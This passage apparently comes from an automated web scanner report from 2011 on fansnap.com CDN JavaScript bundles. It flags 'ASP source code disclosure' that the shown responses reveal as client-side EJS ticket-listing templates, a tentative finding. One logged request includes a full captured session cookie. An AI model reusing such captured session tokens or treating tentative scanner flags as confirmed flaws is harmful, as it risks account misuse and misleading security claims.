User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B9mjiKBjoLb2Zmc2V0af6QnQ%3D%3D--406bc3695b0c3407dbc0a7c3d9f043fb02bee7a5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Jan 2011 00:52:57 GMT
ETag: "9d01e4-1dd-b07bec40"
Accept-Ranges: bytes
Content-Length: 477
Connection: close
Content-Type: text/plain; charset=UTF-8

<div class="ugc-sec-photo">
<% if (uploadEnabled) { %>
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<%= catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
<%= img_tag('/images/rollover-vfs-upload.png', '') %>
</a>
<% } else { %>
<%= img_tag('/images/rollover-vfs-upload.png', '') %>
<% } %>
...[SNIP]...

16.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: OR7ncKwYvc5cp5ICj0h8IEPnrtRoILVjGMI3SFA2P8fmjLESYfEqvpeAXoGi3JEm
x-amz-request-id: FFE99421EFAA9283
Date: Tue, 12 Jul 2011 18:00:07 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:02:29 GMT
ETag: "375af793d6130c7c9074d680589bbc99"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 157752
Server: AmazonS3
Age: 610479
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 94f116c7e716af4a748cff83c3b92ec29316206f5f44be2d4a14aacb7cc60260265b3bdaf16d9578
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 fa6a26613abf7b82a2d399c330c31b47.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>
\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>
\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>
\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>
\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText, \'hoverAction\': true})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row&nbsp;<%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row:&nbsp;<%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.4. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cdn-1.fansnap.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundle2.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-1.fansnap.com

Response

HTTP/1.0 200 OK
x-amz-id-2: sCxnSXOpIiy9OMgiSoYn97LNE4CdZItv9U8so2HvjPasv6zpgNRSAvN0GZnD5RTX
x-amz-request-id: 31879A0D96CFC8F5
Date: Tue, 12 Jul 2011 18:05:10 GMT
x-amz-meta-group: 0
x-amz-meta-owner: 0
x-amz-meta-permissions: 33204
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:39:51 GMT
Last-Modified: Tue, 12 Jul 2011 06:42:23 GMT
ETag: "57246edac8c7716a48ae3dbba6033e35"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 172002
Server: AmazonS3
Age: 606837
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 059383fcc05c34e33da8b899d4706f605c0d5f29a2b78f6d13149e25dca25323838c78f047e1cbe8
Via: 1.0 2815dd16e8c2a0074b81a6148bd8aa3a.cloudfront.net:11180 (CloudFront), 1.0 a02a758285c6952d9ec10f895b84b63a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>
\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>
\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
